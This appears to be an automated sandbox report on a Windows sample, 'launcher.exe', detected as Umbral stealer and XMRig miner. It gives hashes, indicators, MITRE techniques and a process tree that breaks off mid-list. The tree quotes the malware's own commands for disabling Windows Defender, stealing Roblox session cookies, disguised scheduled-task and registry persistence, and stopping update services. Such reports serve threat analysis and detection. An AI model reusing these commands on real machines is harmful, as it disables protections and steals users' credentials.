umbral | a13dd805f2700173d410809954b9d98ae3586c0c65c20270a378887d83b738b0

Analysis

max time kernel
142s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2024 11:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

launcher.exe
Size

40.0MB
MD5

bad6b4ffa6b16bbd802f3f4f887760b2
SHA1

d45d0a086cf87cf14aa129a9b34d5c9f80ab6ae2
SHA256

a13dd805f2700173d410809954b9d98ae3586c0c65c20270a378887d83b738b0
SHA512

fc0398c9ab294dc3f379e1129fbb20e35fcbae728a1619aa3c1f316541dbbb717d9662feca11dd2e1f45c814b2debb9468b99830c8ea33ebff47bc474a87cd1c
SSDEEP

786432:IDOEGyqaCfzdbbTBYlx6Tstl7wi48Yi/xOMx75Ss5VR4L50IhbURTq3:ID7glBYyYtxw58rxOMFXRRIhbU1O

Score

10^/10

umbral xmrig credential_access discovery evasion execution miner persistence privilege_escalation spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023ca9-66.dat	family_umbral
behavioral2/memory/2044-73-0x000001D116C30000-0x000001D116C70000-memory.dmp	family_umbral

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\svchost.exe"	Client.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 24 IoCs

description	pid	Process	procid_target
PID 4200 created 3588	4200	cs2.exe	56
PID 4200 created 3588	4200	cs2.exe	56
PID 4200 created 3588	4200	cs2.exe	56
PID 4200 created 3588	4200	cs2.exe	56
PID 4200 created 3588	4200	cs2.exe	56
PID 1256 created 3588	1256	updater.exe	56
PID 1256 created 3588	1256	updater.exe	56
PID 1256 created 3588	1256	updater.exe	56
PID 1256 created 3588	1256	updater.exe	56
PID 1256 created 3588	1256	updater.exe	56
PID 1256 created 3588	1256	updater.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56
PID 936 created 3588	936	conhost.exe	56

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/1256-230-0x00007FF754D50000-0x00007FF758A14000-memory.dmp	xmrig
behavioral2/memory/3828-311-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-358-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-409-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-441-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-482-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-540-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-569-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-618-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-663-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-702-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-742-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-783-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig
behavioral2/memory/3828-826-0x00007FF7E8A70000-0x00007FF7E925F000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2008	powershell.exe
4856	powershell.exe
1660	powershell.exe
3552	powershell.exe
4220	powershell.exe
1872	powershell.exe
4108	powershell.exe
3648	powershell.exe
1624	powershell.exe
1092	powershell.exe
3804	powershell.exe
2900	powershell.exe
4524	powershell.exe
3772	powershell.exe
228	powershell.exe
4524	powershell.exe
4476	powershell.exe
3672	powershell.exe
2776	powershell.exe
760	powershell.exe
1440	powershell.exe
2364	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Stealer.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	launcher.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe	launcher.exe

Executes dropped EXE 5 IoCs

pid	Process
4200	cs2.exe
4924	kaban.exe
2044	Stealer.exe
956	Client.exe
1256	updater.exe

Loads dropped DLL 32 IoCs

pid	Process
1728	Process not Found
3464	Process not Found
4856	powershell.exe
1068	Process not Found
1432	Process not Found
4004	Process not Found
3772	powershell.exe
1116	WmiApSrv.exe
3676	Process not Found
3452	Process not Found
1220	schtasks.exe
2704	Process not Found
1660	powershell.exe
2040	Process not Found
1440	powershell.exe
4588	Process not Found
3236	schtasks.exe
4324	AUDIODG.EXE
2776	Process not Found
3648	powershell.exe
2276	Process not Found
2364	powershell.exe
3120	Process not Found
4272	schtasks.exe
4652	Process not Found
1624	powershell.exe
852	Process not Found
228	powershell.exe
2728	Process not Found
4276	schtasks.exe
3684	Process not Found
1092	powershell.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\System32"	Client.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cs2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\cs2.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kaban = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kaban.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stealer = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Stealer.exe"	launcher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Client.exe"	launcher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
21	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4468	powercfg.exe
3292	powercfg.exe
5020	powercfg.exe
2548	powercfg.exe
4896	powercfg.exe
3940	powercfg.exe
3128	cmd.exe
4120	powercfg.exe
4512	powercfg.exe
452	cmd.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1256 set thread context of 936	1256	updater.exe	153
PID 1256 set thread context of 3828	1256	updater.exe	154

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\svchost.exe	kaban.exe
File opened for modification	C:\Program Files\svchost.exe	kaban.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	Client.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1724	sc.exe
1960	sc.exe
1212	sc.exe
3292	sc.exe
3344	sc.exe
672	sc.exe
2192	sc.exe
2556	sc.exe
744	sc.exe
4756	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4076	wmic.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2408	schtasks.exe
3000	schtasks.exe
2980	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3552	powershell.exe
3552	powershell.exe
4220	powershell.exe
4220	powershell.exe
3804	powershell.exe
3804	powershell.exe
2900	powershell.exe
2900	powershell.exe
4200	cs2.exe
4200	cs2.exe
2008	powershell.exe
1872	powershell.exe
2008	powershell.exe
1872	powershell.exe
4200	cs2.exe
4200	cs2.exe
4476	powershell.exe
4476	powershell.exe
4200	cs2.exe
4200	cs2.exe
4200	cs2.exe
4200	cs2.exe
3672	powershell.exe
3672	powershell.exe
2776	powershell.exe
2776	powershell.exe
2596	powershell.exe
2596	powershell.exe
4200	cs2.exe
4200	cs2.exe
1256	updater.exe
1256	updater.exe
4108	powershell.exe
4108	powershell.exe
1256	updater.exe
1256	updater.exe
1256	updater.exe
1256	updater.exe
1256	updater.exe
1256	updater.exe
4524	powershell.exe
4524	powershell.exe
760	powershell.exe
760	powershell.exe
1256	updater.exe
1256	updater.exe
1256	updater.exe
1256	updater.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
956	Client.exe
956	Client.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4924	kaban.exe
Token: SeDebugPrivilege	3804	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2044	Stealer.exe
Token: SeDebugPrivilege	956	Client.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeShutdownPrivilege	2548	powercfg.exe
Token: SeCreatePagefilePrivilege	2548	powercfg.exe
Token: SeShutdownPrivilege	4896	powercfg.exe
Token: SeCreatePagefilePrivilege	4896	powercfg.exe
Token: SeShutdownPrivilege	3940	powercfg.exe
Token: SeCreatePagefilePrivilege	3940	powercfg.exe
Token: SeShutdownPrivilege	5020	powercfg.exe
Token: SeCreatePagefilePrivilege	5020	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3672	powershell.exe
Token: SeSecurityPrivilege	3672	powershell.exe
Token: SeTakeOwnershipPrivilege	3672	powershell.exe
Token: SeLoadDriverPrivilege	3672	powershell.exe
Token: SeSystemProfilePrivilege	3672	powershell.exe
Token: SeSystemtimePrivilege	3672	powershell.exe
Token: SeProfSingleProcessPrivilege	3672	powershell.exe
Token: SeIncBasePriorityPrivilege	3672	powershell.exe
Token: SeCreatePagefilePrivilege	3672	powershell.exe
Token: SeBackupPrivilege	3672	powershell.exe
Token: SeRestorePrivilege	3672	powershell.exe
Token: SeShutdownPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeSystemEnvironmentPrivilege	3672	powershell.exe
Token: SeRemoteShutdownPrivilege	3672	powershell.exe
Token: SeUndockPrivilege	3672	powershell.exe
Token: SeManageVolumePrivilege	3672	powershell.exe
Token: 33	3672	powershell.exe
Token: 34	3672	powershell.exe
Token: 35	3672	powershell.exe
Token: 36	3672	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeIncreaseQuotaPrivilege	3672	powershell.exe
Token: SeSecurityPrivilege	3672	powershell.exe
Token: SeTakeOwnershipPrivilege	3672	powershell.exe
Token: SeLoadDriverPrivilege	3672	powershell.exe
Token: SeSystemProfilePrivilege	3672	powershell.exe
Token: SeSystemtimePrivilege	3672	powershell.exe
Token: SeProfSingleProcessPrivilege	3672	powershell.exe
Token: SeIncBasePriorityPrivilege	3672	powershell.exe
Token: SeCreatePagefilePrivilege	3672	powershell.exe
Token: SeBackupPrivilege	3672	powershell.exe
Token: SeRestorePrivilege	3672	powershell.exe
Token: SeShutdownPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeSystemEnvironmentPrivilege	3672	powershell.exe
Token: SeRemoteShutdownPrivilege	3672	powershell.exe
Token: SeUndockPrivilege	3672	powershell.exe
Token: SeManageVolumePrivilege	3672	powershell.exe
Token: 33	3672	powershell.exe
Token: 34	3672	powershell.exe
Token: 35	3672	powershell.exe
Token: 36	3672	powershell.exe
Token: SeIncreaseQuotaPrivilege	3672	powershell.exe
Token: SeSecurityPrivilege	3672	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe
3828	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3412 wrote to memory of 3552	3412	launcher.exe	82
PID 3412 wrote to memory of 3552	3412	launcher.exe	82
PID 3412 wrote to memory of 4200	3412	launcher.exe	86
PID 3412 wrote to memory of 4200	3412	launcher.exe	86
PID 3412 wrote to memory of 4220	3412	launcher.exe	87
PID 3412 wrote to memory of 4220	3412	launcher.exe	87
PID 3412 wrote to memory of 4924	3412	launcher.exe	89
PID 3412 wrote to memory of 4924	3412	launcher.exe	89
PID 3412 wrote to memory of 3804	3412	launcher.exe	91
PID 3412 wrote to memory of 3804	3412	launcher.exe	91
PID 3412 wrote to memory of 2044	3412	launcher.exe	94
PID 3412 wrote to memory of 2044	3412	launcher.exe	94
PID 3412 wrote to memory of 2900	3412	launcher.exe	95
PID 3412 wrote to memory of 2900	3412	launcher.exe	95
PID 3412 wrote to memory of 956	3412	launcher.exe	97
PID 3412 wrote to memory of 956	3412	launcher.exe	97
PID 2044 wrote to memory of 2008	2044	Stealer.exe	98
PID 2044 wrote to memory of 2008	2044	Stealer.exe	98
PID 2044 wrote to memory of 4476	2044	Stealer.exe	102
PID 2044 wrote to memory of 4476	2044	Stealer.exe	102
PID 612 wrote to memory of 744	612	cmd.exe	106
PID 612 wrote to memory of 744	612	cmd.exe	106
PID 612 wrote to memory of 1212	612	cmd.exe	107
PID 612 wrote to memory of 1212	612	cmd.exe	107
PID 612 wrote to memory of 3292	612	cmd.exe	146
PID 612 wrote to memory of 3292	612	cmd.exe	146
PID 612 wrote to memory of 4756	612	cmd.exe	109
PID 612 wrote to memory of 4756	612	cmd.exe	109
PID 612 wrote to memory of 1724	612	cmd.exe	148
PID 612 wrote to memory of 1724	612	cmd.exe	148
PID 452 wrote to memory of 2548	452	cmd.exe	115
PID 452 wrote to memory of 2548	452	cmd.exe	115
PID 452 wrote to memory of 4896	452	cmd.exe	116
PID 452 wrote to memory of 4896	452	cmd.exe	116
PID 452 wrote to memory of 3940	452	cmd.exe	117
PID 452 wrote to memory of 3940	452	cmd.exe	117
PID 452 wrote to memory of 5020	452	cmd.exe	118
PID 452 wrote to memory of 5020	452	cmd.exe	118
PID 2044 wrote to memory of 2776	2044	Stealer.exe	119
PID 2044 wrote to memory of 2776	2044	Stealer.exe	119
PID 2044 wrote to memory of 2596	2044	Stealer.exe	121
PID 2044 wrote to memory of 2596	2044	Stealer.exe	121
PID 2044 wrote to memory of 4136	2044	Stealer.exe	128
PID 2044 wrote to memory of 4136	2044	Stealer.exe	128
PID 4992 wrote to memory of 1960	4992	cmd.exe	132
PID 4992 wrote to memory of 1960	4992	cmd.exe	132
PID 4992 wrote to memory of 3344	4992	cmd.exe	133
PID 4992 wrote to memory of 3344	4992	cmd.exe	133
PID 2044 wrote to memory of 4728	2044	Stealer.exe	134
PID 2044 wrote to memory of 4728	2044	Stealer.exe	134
PID 4992 wrote to memory of 672	4992	cmd.exe	136
PID 4992 wrote to memory of 672	4992	cmd.exe	136
PID 4992 wrote to memory of 2192	4992	cmd.exe	137
PID 4992 wrote to memory of 2192	4992	cmd.exe	137
PID 4992 wrote to memory of 2556	4992	cmd.exe	138
PID 4992 wrote to memory of 2556	4992	cmd.exe	138
PID 3128 wrote to memory of 4120	3128	cmd.exe	141
PID 3128 wrote to memory of 4120	3128	cmd.exe	141
PID 3128 wrote to memory of 4512	3128	cmd.exe	142
PID 3128 wrote to memory of 4512	3128	cmd.exe	142
PID 2044 wrote to memory of 4504	2044	Stealer.exe	143
PID 2044 wrote to memory of 4504	2044	Stealer.exe	143
PID 3128 wrote to memory of 4468	3128	cmd.exe	145
PID 3128 wrote to memory of 4468	3128	cmd.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3588
- C:\Users\Admin\AppData\Local\Temp\launcher.exe
  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cs2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- - C:\Users\Admin\AppData\Local\Temp\cs2.exe
    "C:\Users\Admin\AppData\Local\Temp\cs2.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kaban.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4220
- - C:\Users\Admin\AppData\Local\Temp\kaban.exe
    "C:\Users\Admin\AppData\Local\Temp\kaban.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    PID:4924
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio Host" /tr "C:\Program Files\svchost.exe" & exit
      4⤵
      PID:684
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Visio Host" /tr "C:\Program Files\svchost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2408
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "F.lux" /tr "C:\Program Files\svchost.exe" /RL HIGHEST & exit
      4⤵
      PID:4748
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "F.lux" /tr "C:\Program Files\svchost.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3804
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2596
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      PID:4136
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:4728
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:760
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    3⤵
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:956
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "TeamViewer Host" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\svchost.exe" & exit
      4⤵
      PID:2220
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "TeamViewer Host" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\svchost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3000
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "QuickBooks" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\svchost.exe" /RL HIGHEST & exit
      4⤵
      PID:3284
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\System32" /RL HIGHEST & exit
      4⤵
      PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Windows\System32\sc.exe
